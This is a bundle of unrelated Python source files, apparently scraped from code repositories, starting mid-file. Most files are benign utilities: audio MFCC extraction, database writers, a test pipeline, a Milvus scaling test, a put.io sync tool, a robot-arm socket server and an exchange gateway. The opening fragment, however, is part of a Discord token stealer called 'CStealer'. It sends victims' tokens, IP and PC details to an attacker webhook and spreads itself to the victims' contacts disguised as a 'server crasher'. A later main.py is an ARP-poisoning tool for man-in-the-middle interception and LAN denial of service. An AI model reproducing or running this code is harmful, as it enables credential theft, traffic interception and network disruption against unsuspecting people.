"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
},
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": "Hooked at • " + dt.strftime('%Y-%m-%d %H:%M:%S'),
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "CStealer",
"avatar_url": "https://i.hizliresim.com/9ftjid9.jpg"
}
try:
urlopen(Request(WEBHOOK_URL, data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
create_audio_features.py |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This script is adapted from Alexander berard seq2seq feature extract script:
# https://github.com/alex-berard/seq2seq/blob/master/scripts/speech/extract.py
from __future__ import division
import argparse
import numpy as np
import yaafelib
import tarfile
import tempfile
import os
from collections import Counter
import math
import multiprocessing
parser = argparse.ArgumentParser()
parser.add_argument('inpath',
help='Path to folder, that contains all the wav files')
parser.add_argument(
'outpath', help='Output path to folder, to save features to')
parser.add_argument('logpath', help="Path to save log files to")
parser.add_argument('n_cpus', help='Number of cpus for multiprocessing')
parser.add_argument('--derivatives', action='store_true')
args = parser.parse_args()
parameters = dict(
step_size=160, # corresponds to 10 ms (at 16 kHz)
block_size=640, # corresponds to 40 ms
mfcc_coeffs=40,
# more filters? (needs to be at least mfcc_coeffs+1, because first coeff is ignored)
mfcc_filters=41
)
# TODO: ensure that all input files use this rate
fp = yaafelib.FeaturePlan(sample_rate=16000)
mfcc_features = 'MFCC MelNbFilters={mfcc_filters} CepsNbCoeffs={mfcc_coeffs} ' \
'blockSize={block_size} stepSize={step_size}'.format(
**parameters)
energy_features = 'Energy blockSize={block_size} stepSize={step_size}'.format(
**parameters)
fp.addFeature('mfcc: {}'.format(mfcc_features))
if args.derivatives:
fp.addFeature('mfcc_d1: {} > Derivate DOrder=1'.format(mfcc_features))
fp.addFeature('mfcc_d2: {} > Derivate DOrder=2'.format(mfcc_features))
fp.addFeature('energy: {}'.format(energy_features))
if args.derivatives:
fp.addFeature('energy_d1: {} > Derivate DOrder=1'.format(energy_features))
fp.addFeature('energy_d2: {} > Derivate DOrder=2'.format(energy_features))
if args.derivatives:
keys = ['mfcc', 'mfcc_d1', 'mfcc_d2', 'energy', 'energy_d1', 'energy_d2']
else:
keys = ['mfcc', 'energy']
df = fp.getDataFlow()
engine = yaafelib.Engine()
engine.load(df)
afp = yaafelib.AudioFileProcessor()
frame_counter = Counter()
inpath = args.inpath
outpath = args.outpath
logpath = args.logpath
errorlogfile = os.path.join(logpath, "errorlog.txt")
erroraudios = os.path.join(logpath, "erroraudios.txt")
progresslog = os.path.join(logpath, "progress.txt")
if not os.path.exists(outpath):
os.makedirs(outpath)
if not os.path.exists(logpath):
os.makedirs(logpath)
with open(errorlogfile, "w") as errorfile:
errorfile.write(
"This file is a log for all the errors that occured while creating the MFCC features.\n")
errorfile.write(
"See erroraudios.txt for a list of the audios, that caused errors.\n\n")
with open(erroraudios, "w") as collectionfile:
pass
with open(progresslog, "w") as progressfile:
pass
audios = []
n_cpus = int(args.n_cpus)
for audio in os.listdir(inpath):
audios.append(audio)
chunk_size = math.floor(len(audios) / n_cpus)
chunk_size_leftover = len(audios) - chunk_size * n_cpus
last_chunk = chunk_size + chunk_size_leftover
print("Chunk size = {}".format(chunk_size))
print("Last chunk size = {}".format(last_chunk))
commands_1_n = audios[:-last_chunk]
command_n = audios[-last_chunk:]
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def do_command(filenames, process_id):
counter = 0
for it, file_name in enumerate(filenames):
counter += 1
if it % 1000 == 0:
progress_message = "Process {} done {} out of {}".format(
process_id, it, len(filenames))
with open(progresslog, "a+") as progressfile:
print(progress_message)
progressfile.write(progress_message + "\n")
try:
afp.processFile(engine, os.path.join(inpath, file_name))
feats = engine.readAllOutputs()
feats = np.concatenate([feats[k] for k in keys], axis=1)
frames, dim = feats.shape
feats = feats.astype(np.float32)
if frames == 0:
with open(errorlogfile, "a+") as errorfile:
errorfile.write(
"{} seems to be an empty audio or not an audio file \n\n".format(file_name))
with open(erroraudios, "a+") as collectionfile:
collectionfile.write(
file_name + "\n")
else:
np.save(os.path.join(
outpath, file_name.replace(".wav", ".npy")), feats)
except Exception as e:
with open(errorlogfile, "a+") as errorfile:
errorfile.write(
"Error occured at file: {} \n".format(file_name))
errorfile.write("Error type: {}\n".format(type(e)))
errorfile.write("Error message: {}\n\n".format(str(e)))
with open(erroraudios, "a+") as collectionfile:
collectionfile.write(
file_name + "\n")
if it == len(filenames) - 1:
print("Process {} is Done".format(process_id))
processes = []
for i, chunk in enumerate(chunks(commands_1_n, chunk_size)):
p = multiprocessing.Process(target=do_command, args=[chunk, i])
processes.append(p)
p = multiprocessing.Process(target=do_command, args=[command_n, i + 1])
processes.append(p)
for i, p in enumerate(processes):
p.start()
print("Started process {}".format(i + 1))
print("started all {} processes".format(n_cpus))
for process in processes:
process.join()
print("\n\nDone with everything")
|
processwriter.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing as mp
import logging
from clickhouse_mysql.writer.writer import Writer
class ProcessWriter(Writer):
"""Start write procedure as a separated process"""
args = None
def __init__(self, **kwargs):
next_writer_builder = kwargs.pop('next_writer_builder', None)
converter_builder = kwargs.pop('converter_builder', None)
super().__init__(next_writer_builder=next_writer_builder, converter_builder=converter_builder)
for arg in kwargs:
self.next_writer_builder.param(arg, kwargs[arg])
def opened(self):
pass
def open(self):
pass
def process(self, event_or_events=None):
"""Separate process body to be run"""
logging.debug('class:%s process()', __class__)
writer = self.next_writer_builder.get()
writer.insert(event_or_events)
writer.close()
writer.push()
writer.destroy()
logging.debug('class:%s process() done', __class__)
def processDelete(self, event_or_events=None):
"""Separate process body to be run"""
logging.debug('class:%s process()', __class__)
writer = self.next_writer_builder.get()
writer.deleteRow(event_or_events)
writer.close()
writer.push()
writer.destroy()
logging.debug('class:%s process() done', __class__)
def processUpdate(self, event_or_events=None):
"""Separate process body to be run"""
logging.debug('class:%s process()', __class__)
writer = self.next_writer_builder.get()
writer.delete(event_or_events)
writer.close()
writer.push()
writer.destroy()
logging.debug('class:%s process() done', __class__)
def insert(self, event_or_events=None):
# event_or_events = [
# event: {
# row: {'id': 3, 'a': 3}
# },
# event: {
# row: {'id': 3, 'a': 3}
# },
# ]
# start separated process with event_or_events to be inserted
logging.debug('class:%s insert', __class__)
process = mp.Process(target=self.process, args=(event_or_events,))
logging.debug('class:%s insert.process.start()', __class__)
process.start()
#process.join()
logging.debug('class:%s insert done', __class__)
pass
def delete(self, event_or_events=None):
# event_or_events = [
# event: {
# row: {'id': 3, 'a': 3}
# },
# event: {
# row: {'id': 3, 'a': 3}
# },
# ]
# start separated process with event_or_events to be inserted
logging.debug('class:%s delete', __class__)
process = mp.Process(target=self.processDelete, args=(event_or_events,))
logging.debug('class:%s delete.process.start()', __class__)
process.start()
#process.join()
logging.debug('class:%s delete done', __class__)
pass
def update(self, event_or_events=None):
# event_or_events = [
# event: {
# row: {'id': 3, 'a': 3}
# },
# event: {
# row: {'id': 3, 'a': 3}
# },
# ]
# start separated process with event_or_events to be inserted
logging.debug('class:%s update', __class__)
process = mp.Process(target=self.processUpdate, args=(event_or_events,))
logging.debug('class:%s update.process.start()', __class__)
process.start()
#process.join()
logging.debug('class:%s update done', __class__)
pass
def flush(self):
pass
def push(self):
pass
def destroy(self):
pass
def close(self):
pass
|
concurrency.py | from threading import Thread
from rx.core.typing import StartableTarget
def default_thread_factory(target: StartableTarget) -> Thread:
return Thread(target=target, daemon=True)
def synchronized(lock):
"""A decorator for synchronizing access to a given function."""
def wrapper(fn):
def inner(*args, **kw):
with lock:
return fn(*args, **kw)
return inner
return wrapper
|
dummy.py | '''
Copyright 2013 Douglas Gibbons
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import logging
from django.core.management.base import BaseCommand
import httplib,urllib
import datetime
import random
import time
import threading
from boto.dynamodb.condition import NULL
''' Pretends to be a whole pipeline; adding builds,deploys,testruns in real time'''
logger = logging.getLogger(__name__)
class Dummy(BaseCommand):
def nowString(self):
'''Could just return the text "now" instead'''
# return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
return 'now'
def sleepRandom(self):
minTime = 0 # seconds
maxTime = 30
t = random.randrange(minTime, maxTime, 1)
logger.debug('Sleeping for '+str(t)+' seconds')
time.sleep(t)
def getUrl(self,url,dict):
hostname='localhost'
port=8000
conn = httplib.HTTPConnection(hostname,port)
params = urllib.urlencode(dict)
logger.debug('Getting '+url)
conn.request("GET",url + '?' + params)
response = conn.getresponse()
id = response.read()
logger.debug('Got back ID '+str(id))
return id
def createBuild(self,productName,version):
'''Build'''
url = '/dash/new_build'
dict = {
'Product.name' : productName,
'Build.version' : version,
'Build.revision' : '1000',
'Build.start' : self.nowString()
}
id = self.getUrl(url,dict)
return id
def updateBuild(self,id,success):
self.sleepRandom()
url = '/dash/update_build'
dict = {
'Build.id' : str(id),
'Build.success' : success,
'Build.end' : self.nowString()
}
self.getUrl(url,dict)
def createDeploy(self,productName,version,environment,hostname=False):
''' Deploy '''
logger.debug('Deploying '+version)
url = '/dash/new_deploy'
dict = {
'Product.name' : productName,
'Deploy.version' : version,
'Environment.name' : environment,
'Deploy.start' : self.nowString()
}
if hostname:
dict.update({'Host.name' : hostname})
id = self.getUrl(url,dict)
return id
def updateDeploy(self,id,success):
url = '/dash/update_deploy'
dict = {
'Deploy.id' : str(id),
'Deploy.success' : '1' ,
'Deploy.end' : self.nowString()
}
id = self.getUrl(url,dict)
def createTest(self,productName,version):
'''Fail now and again'''
''' Test '''
logger.debug('Testing '+version)
url = '/dash/new_testrun'
dict = {
'Product.name' : productName,
'Testpack.name' : 'Sanity',
'Testrun.version' : version,
'Environment.name' : 'Test',
'Testrun.start' : self.nowString()
}
id = self.getUrl(url,dict)
return id
def updateTest(self,id,success):
url = '/dash/update_testrun'
dict = {
'Testrun.id' : str(id),
'Testrun.success' : success,
'Testrun.end' : self.nowString()
}
id = self.getUrl(url,dict)
def delivery(self,productName):
for i in range(30):
success = 1
version = '1.0-'+str(i)
'''Build'''
logger.debug('Building version '+version)
'''Building'''
id = self.createBuild(productName,version)
self.sleepRandom()
self.updateBuild(id,success)
'''Deploying'''
id = self.createDeploy(productName,version,"Test","testhost1")
self.sleepRandom()
self.updateDeploy(id,success)
id = self.createDeploy(productName,version,"Test","testhost2")
self.sleepRandom()
self.updateDeploy(id,success)
'''Testing'''
id = self.createTest(productName,version)
self.sleepRandom()
self.sleepRandom()
'''Was the testing success? Lets add a random element'''
if random.randrange(0, 3, 1) == 1:
self.updateTest(id,'')
else:
self.updateTest(id,1)
'''Deploying - staging. Note: No hostname given. Should be ok'''
id = self.createDeploy(productName,version,"Staging")
self.sleepRandom()
self.updateDeploy(id,success)
self.sleepRandom()
'''Deploying - production'''
id = self.createDeploy(productName,version,"Production","testprod1")
self.sleepRandom()
self.updateDeploy(id,success)
id = self.createDeploy(productName,version,"Production","testprod2")
self.sleepRandom()
self.updateDeploy(id,success)
def run(self):
threads = []
for product in ['UI', 'API', 'DB', 'Reports', 'Security']:
# self.delivery(product)
t = threading.Thread(target=self.delivery, args=(product,))
threads.append(t)
t.start()
|
test_proxy_scale.py | import multiprocessing
import pytest
from customize.milvus_operator import MilvusOperator
from common import common_func as cf
from common.common_type import CaseLabel
from scale import scale_common as sc, constants
from utils.util_log import test_log as log
from utils.util_k8s import wait_pods_ready
prefix = "proxy_scale"
class TestProxyScale:
def e2e_milvus_parallel(self, process_num, host, c_name):
process_list = []
for i in range(process_num):
p = multiprocessing.Process(target=sc.e2e_milvus, args=(host, c_name))
p.start()
process_list.append(p)
for p in process_list:
p.join()
@pytest.mark.tags(CaseLabel.L3)
def test_scale_proxy(self):
"""
target: test milvus operation after proxy expand
method: 1.deploy 1 proxy replicas
2.milvus e2e test in parallel
3.expand proxy pod from 1 to 5
4.milvus e2e test
5.shrink proxy from 5 to 2
expected: 1.verify data consistent and func work
"""
# deploy milvus cluster with one proxy
release_name = "scale-proxy"
image = f'{constants.IMAGE_REPOSITORY}:{constants.IMAGE_TAG}'
data_config = {
'metadata.namespace': constants.NAMESPACE,
'metadata.name': release_name,
'spec.components.image': image,
'spec.components.proxy.serviceType': 'LoadBalancer',
'spec.components.proxy.replicas': 1,
'spec.components.dataNode.replicas': 2,
'spec.config.dataCoord.enableCompaction': True,
'spec.config.dataCoord.enableGarbageCollection': True
}
mic = MilvusOperator()
mic.install(data_config)
healthy = mic.wait_for_healthy(release_name, constants.NAMESPACE, timeout=1200)
log.info(f"milvus healthy: {healthy}")
host = mic.endpoint(release_name, constants.NAMESPACE).split(':')[0]
# host = "10.98.0.7"
c_name = cf.gen_unique_str(prefix)
self.e2e_milvus_parallel(5, host, c_name)
log.info('Milvus test before expand')
# expand proxy replicas from 1 to 5
mic.upgrade(release_name, {'spec.components.proxy.replicas': 5}, constants.NAMESPACE)
wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
self.e2e_milvus_parallel(5, host, c_name)
log.info('Milvus test after expand')
# expand proxy replicas from 5 to 2
mic.upgrade(release_name, {'spec.components.proxy.replicas': 2}, constants.NAMESPACE)
wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
self.e2e_milvus_parallel(2, host, c_name)
log.info('Milvus test after shrink')
# mic.uninstall(release_name, namespace=constants.NAMESPACE)
|
frontend.py | import argparse
import shlex
import sys
import threading
import subprocess
import putiopy
import re
import logging
from pid import PidFile
from putiosync.core import TokenManager, PutioSynchronizer, DatabaseManager
from putiosync.download_manager import DownloadManager
from putiosync.watcher import TorrentWatcher
from putiosync.webif.webif import WebInterface
__author__ = 'Paul Osborne'
logger = logging.getLogger("putiosync")
logger.setLevel(logging.ERROR)
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument(
"-k", "--keep",
action="store_true",
default=False,
help="Keep files on put.io; do not automatically delete"
)
parser.add_argument(
"--force-keep",
default=None,
type=str,
help=(
"Filter for skipping deletion of specific files/folders. "
"If keep parameter is set to false, only files/folders will be deleted which "
"do not match the given regex. "
"Example: putio-sync -force-keep=\"^/Series$\" /path/to/Downloads"
)
)
parser.add_argument(
"-q", "--quiet",
action="store_true",
default=False,
help="Prevent browser from launching on start."
)
parser.add_argument(
"-p", "--poll-frequency",
default=60 * 3,
type=int,
help="Polling frequency in seconds (default: 3 minutes)",
)
parser.add_argument(
"--pid",
default=None,
type=str,
help="Path where the pid file should be created (default: None)",
)
parser.add_argument(
"--log",
default=None,
type=str,
help="Path where the log file should be stored (default: None)",
)
parser.add_argument(
"--log-webif",
default=None,
type=str,
help="Path where the log file for the web interface should be stored (default: None)",
)
parser.add_argument(
"--log-level",
default="debug",
type=str,
help="Loglevel [debug, info, warning, error, critical] (default: debug)",
)
parser.add_argument(
"-c", "--post-process-command",
default=None,
type=str,
help=(
"Command to be executed after the completion of every download. "
"The command will be executed with the path to the file that has "
"just been completed as an argument. "
"Example: putio-sync -c 'python /path/to/postprocess.py' /path/to/Downloads"
),
)
parser.add_argument(
"-w", "--watch-directory",
default=None,
type=str,
help=(
"Directory to watch for torrent or magnet files. If this option is "
"present and new files are added, they will be added to put.io and "
"automatically downloaded by the daemon when complete."
)
)
parser.add_argument(
"--host",
default="0.0.0.0",
type=str,
help="Host where the webserver should listen to. Default: 0.0.0.0"
)
parser.add_argument(
"--port",
default=7001,
type=int,
help="Port where the webserver should listen to. Default: 7001"
)
parser.add_argument(
"-f", "--filter",
default=None,
type=str,
help=(
"Filter for excluding or including specific files/folders from downloading. "
"The filter is a regular expression (regex). "
"Example: putio-sync -f '/some/folder/*.avi' /path/to/Downloads"
)
)
parser.add_argument(
"download_directory",
help="Directory into which files should be downloaded"
)
args = parser.parse_args()
return args
def build_postprocess_download_completion_callback(postprocess_command):
def download_completed(download):
cmd=postprocess_command.format(download.get_destination_path().encode('utf-8'))
logger.info("Postprocess: {0}".format(cmd))
subprocess.call(cmd, shell=True)
return download_completed
def start_sync(args):
formatter = logging.Formatter('%(asctime)s | %(name)-12s | %(levelname)-8s | %(message)s')
log_level = logging.ERROR
if args.log_level is not None:
if args.log_level == "debug":
log_level = logging.DEBUG
elif args.log_level == "info":
log_level = logging.INFO
elif args.log_level == "warning":
log_level = logging.WARNING
elif args.log_level == "error":
log_level = logging.ERROR
elif args.log_level == "critical":
log_level = logging.CRITICAL
else:
print("Invalid log-level argument")
ch = logging.StreamHandler()
ch.setLevel(log_level)
ch.setFormatter(formatter)
if args.log is not None:
fh = logging.FileHandler(args.log)
fh.setLevel(log_level)
fh.setFormatter(formatter)
logger.addHandler(fh)
else:
logger.addHandler(ch)
log_webif = logging.getLogger('werkzeug')
log_webif.setLevel(log_level)
log_webif.disabled = True
if args.log_webif is not None:
fh = logging.FileHandler(args.log_webif)
fh.setLevel(log_level)
fh.setFormatter(formatter)
log_webif.addHandler(fh)
else:
log_webif.addHandler(ch)
# Restore or obtain a valid token
token_manager = TokenManager()
token = token_manager.get_token()
while not token_manager.is_valid_token(token):
print("No valid token found! Please provide one.")
token = token_manager.obtain_token()
token_manager.save_token(token)
# Let's start syncing!
putio_client = putiopy.Client(token)
db_manager = DatabaseManager()
download_manager = DownloadManager(token=token)
if args.post_process_command is not None:
download_manager.add_download_completion_callback(
build_postprocess_download_completion_callback(args.post_process_command))
if args.watch_directory is not None:
torrent_watcher = TorrentWatcher(args.watch_directory, putio_client)
torrent_watcher.start()
filter_compiled = None
if args.filter is not None:
try:
filter_compiled = re.compile(args.filter)
except re.error as e:
print("Invalid filter regex: {0}".format(e))
exit(1)
force_keep_compiled = None
if args.force_keep is not None:
try:
force_keep_compiled = re.compile(args.force_keep)
except re.error as e:
print("Invalid force_keep regex: {0}".format(e))
exit(1)
download_manager.start()
synchronizer = PutioSynchronizer(
download_directory=args.download_directory,
putio_client=putio_client,
db_manager=db_manager,
download_manager=download_manager,
keep_files=args.keep,
poll_frequency=args.poll_frequency,
download_filter=filter_compiled,
force_keep=force_keep_compiled,
disable_progress=args.log is not None)
t = threading.Thread(target=synchronizer.run_forever)
t.setDaemon(True)
t.start()
web_interface = WebInterface(db_manager, download_manager, putio_client, synchronizer, launch_browser=(not args.quiet), host=args.host, port=args.port)
web_interface.run()
def main():
args = parse_arguments()
if args.pid is not None:
with PidFile(args.pid):
return start_sync(args)
else:
return start_sync(args)
if __name__ == '__main__':
sys.exit(main())
|
main.py | from scapy.all import *
import os
import signal
import sys
import threading
import time
import subprocess
import socket
self_ip = str(subprocess.check_output("ipconfig getifaddr en0", shell=True))[2:-3]
lan = self_ip.split(".")
lan = lan[0] + "." + lan[1] + "." + lan[2]
self_id = lan[3]
nmap_broadcast = lan + ".1/24"
gateway_ip = str(subprocess.check_output("route get default | grep gateway | cut -f 2 -d \":\"", shell=True))[3:-3]
gateway_mac = ""
packet_count = 1000
hosts = dict()
online_hosts = dict()
def get_online_hosts_with_mac():
print("finding all the hosts with mac addresses in the lan")
global nmap_broadcast
subprocess.check_output("nmap -sP " + nmap_broadcast, shell=True)
arp_result = subprocess.check_output("arp -a", shell=True)
if arp_result == "":
print("no online hosts were find or internet connection is lost")
return
arp_result = arp_result.decode().split('\n')
del arp_result[-1]
for host in arp_result:
host = host.split(" ")
if host[3] == "(incomplete)":
continue
global hosts
hosts[host[1][1:-1]] = host[3]
global gateway_ip
global gateway_mac
if host[1][1:-1] == gateway_ip:
gateway_mac = host[3]
def get_online_hosts():
print("finding all the hosts with mac addresses in the lan")
global nmap_broadcast
subprocess.check_output("nmap -sP " + nmap_broadcast, shell=True)
arp_result = subprocess.check_output("arp -a", shell=True)
if arp_result == "":
print("no online hosts were find or internet connection is lost")
return
arp_result = arp_result.decode().split('\n')
del arp_result[-1]
global online_hosts
for host in arp_result:
host = host.split(" ")
online_hosts[host[1][1:-1]] = host[3]
def arp_poison(target_ip):
global gateway_mac, gateway_ip
if gateway_ip == "" or gateway_mac == "":
get_online_hosts_with_mac()
print("starting the mitm attack")
try:
while True:
send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip), verbose=False)
send(ARP(op=2, pdst=target_ip, hwdst=hosts[target_ip], psrc=gateway_ip), verbose=False)
time.sleep(1)
except KeyboardInterrupt:
print("restoring network")
restore()
except Exception as e:
print(e)
def arp_poison_broadcast():
global gateway_mac, gateway_ip
if gateway_ip == "" or gateway_mac == "":
get_online_hosts_with_mac()
print("starting the mitm attack")
try:
while True:
for i in range(1, 255):
if i == self_id:
continue
target_ip = lan + "." + str(i)
if target_ip not in hosts.keys():
continue
send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip), verbose=False)
send(ARP(op=2, pdst=target_ip, hwdst=hosts[target_ip], psrc=gateway_ip), verbose=False)
#time.sleep(2)
except KeyboardInterrupt:
print("restoring network")
restore()
except Exception as e:
print(e)
def mitm_callback(pkt):
pkt.show()
def enable_forwarding():
os.system("sudo sysctl -w net.inet.ip.forwarding=1")
def disable_forwarding():
os.system("sudo sysctl -w net.inet.ip.forwarding=0")
def restore():
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=hosts[target_ip], psrc=target_ip), count=5, verbose=False)
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5, verbose=False)
#disable_forwarding()
enable_forwarding()
def restore_broadcast():
for i in range(1, 255):
if i == self_id:
continue
target_ip = lan + "." + str(i)
if target_ip not in hosts.keys():
continue
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=hosts[target_ip], psrc=target_ip), count=5, verbose=False)
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5, verbose=False)
#disable_forwarding()
enable_forwarding()
while 1:
print("select from below options")
print("1 get online hosts with mac addresses")
print("2 mitm on a victim")
print("3 dos on a victim")
print("4 mitm on the lan")
print("5 dos on the lan")
option = input()
if option == "1":
get_online_hosts_with_mac()
for key, value in hosts.items():
if key == gateway_ip and value == gateway_mac:
print(key + " at " + value + " as gateway")
continue
try:
print(key + " at " + value + " " + socket.gethostbyaddr(key))
except Exception as e:
print(key + " at " + value)
print()
elif option == "2":
print("enter the ip of the victim")
target_ip = input()
if target_ip == self_ip:
print("cannot attack yourself")
print()
continue
else:
try:
enable_forwarding()
poison_thread = threading.Thread(target=arp_poison, args=(target_ip,))
poison_thread.start()
sniff_filter = "ip host " + target_ip
print(f"[*] Starting network capture. Filter: {sniff_filter}")
packets = sniff(filter=sniff_filter, prn=mitm_callback, iface="en0")
#packets = sniff(iface="en0", prn=mitm_callback, filter="tcp")
wrpcap(target_ip + "_capture.pcap", packets)
except KeyboardInterrupt:
print("restoring network")
restore()
print("restoring network")
restore()
elif option == "3":
print("enter the ip of the victim")
target_ip = input()
if target_ip == self_ip:
print("cannot attack yourself")
print()
continue
else:
try:
disable_forwarding()
poison_thread = threading.Thread(target=arp_poison, args=(target_ip,))
poison_thread.start()
sniff_filter = "ip host " + target_ip
print(f"[*] Starting network capture. Filter: {sniff_filter}")
packets = sniff(filter=sniff_filter, prn=mitm_callback, iface="en0")
#packets = sniff(iface="en0", prn=mitm_callback, filter="tcp")
wrpcap(target_ip + "_denied.pcap", packets)
except KeyboardInterrupt:
print("restoring network")
restore()
print("restoring network")
restore()
elif option == "4":
try:
enable_forwarding()
poison_thread = threading.Thread(target=arp_poison_broadcast)
poison_thread.start()
#sniff_filter = "ip host not" + self_ip
print(f"[*] Starting network capture.")
packets = sniff(prn=mitm_callback, iface="en0")
#packets = sniff(iface="en0", prn=mitm_callback, filter="tcp")
wrpcap("lan_capture.pcap", packets)
except KeyboardInterrupt:
print("restoring network")
restore()
print("restoring network")
restore_broadcast()
elif option == "5":
try:
disable_forwarding()
poison_thread1 = threading.Thread(target=arp_poison_broadcast)
poison_thread1.start()
poison_thread2 = threading.Thread(target=arp_poison_broadcast)
poison_thread2.start()
poison_thread3 = threading.Thread(target=arp_poison_broadcast)
poison_thread3.start()
#sniff_filter = "ip host " + target_ip
print(f"[*] Starting network capture.")
packets = sniff(prn=mitm_callback, iface="en0")
#packets = sniff(iface="en0", prn=mitm_callback, filter="tcp")
wrpcap("lan_denied.pcap", packets)
except KeyboardInterrupt:
print("restoring network")
restore_broadcast()
disable_forwarding()
|
ArmServer.py | #!/usr/bin/python3
# encoding: utf-8
import socketserver
import threading
import time
import re
import ArmController as controller #舵机转动
import LeConf #偏差
from ArmCmd import LeError
import ArmCmd
import ArmWebServer as web
class ServoServer(socketserver.BaseRequestHandler):
def handle(self):
print("已连接")
conn = self.request
Flag = True
recv = b''
recv_data = ""
while Flag:
try:
recv = conn.recv(1024)
recv_data += recv.decode()
# print(recv_data)
if not recv_data:
Flag = False
print("break")
break
recv_data = recv_data.replace(' ', '')
cp = re.compile(r'\r\n')
test = cp.search(recv_data)
if test:
rdata = recv_data.split("\r\n") #分割
recv_data = recv_data[len(rdata[0]) + 2:]
rdata = [rdata[0]]
for data in rdata:
if data:
rex = re.compile(r'^(I[0-9]{3}).*') # 判断收到的指令是否符合规则
match = data
#print(match)
match = rex.match(match)
# print('******')
if match:
if not 0 == match.start() or not len(data) == match.end():
print("错误指令 1")
else:
data = data.split('-')
cmd = data[0][1:5]
del data[0]
par = []
#print(data)
try:
cmd = int(cmd)
if cmd >= 3 and cmd <= 7:
print(cmd)
ArmCmd.cmd_list[cmd](conn, data)
else:
for p in data:
par.append(int(p))
print(cmd, par)
ArmCmd.cmd_list[cmd](par)
except LeError as err:
print(err.msg)
print(err.data)
except:
print("指令执行错误")
if not Flag:
print("break1")
break
except Exception as e:
print(e)
break
def finish(self):
print("已断开")
class LeServer(socketserver.ThreadingTCPServer):
allow_reuse_address = True
if __name__ == "__main__":
if not len(LeConf.Deviation) == 6:
print("偏差数量错误")
sys.exit()
else:
d = []
for i in range(0,len(LeConf.Deviation), 1):
if LeConf.Deviation[i] > 1600 or LeConf.Deviation [i]< 1400:
print("偏差值超出范围1200-1800")
sys.exit()
else:
d.append(LeConf.Deviation[i] - 1500)
controller.initLeArm(tuple(d))
ArmCmd.cmd_i001([1000, 6, 1, 1500, 2, 1500, 3, 1500, 4, 1500, 5, 1500, 6, 500])
server = LeServer(("", 8947), ServoServer)
try:
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
web.run()
while True:
time.sleep(0.1)
except:
server.shutdown()
server.server_close()
controller.stopLeArm()
|
gateio.py | from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
import time
import threading
class ExchGwApiGateio(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_trades_timestamp_field_name(cls):
return 'timestamp'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tradeID'
@classmethod
def get_trade_price_field_name(cls):
return 'rate'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "http://data.gate.io/api2/1/orderBook/%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
return "http://data.gate.io/api2/1/tradeHistory/%s" % \
(instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# No Date time information, has update id only
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
max_bid_len = min(len(bids), 5)
for i in range(0, max_bid_len):
l2_depth.bids[i].price = float(bids[i][0]) if type(bids[i][0]) != float else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if type(bids[i][1]) != float else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
max_ask_len = min(len(asks), 5)
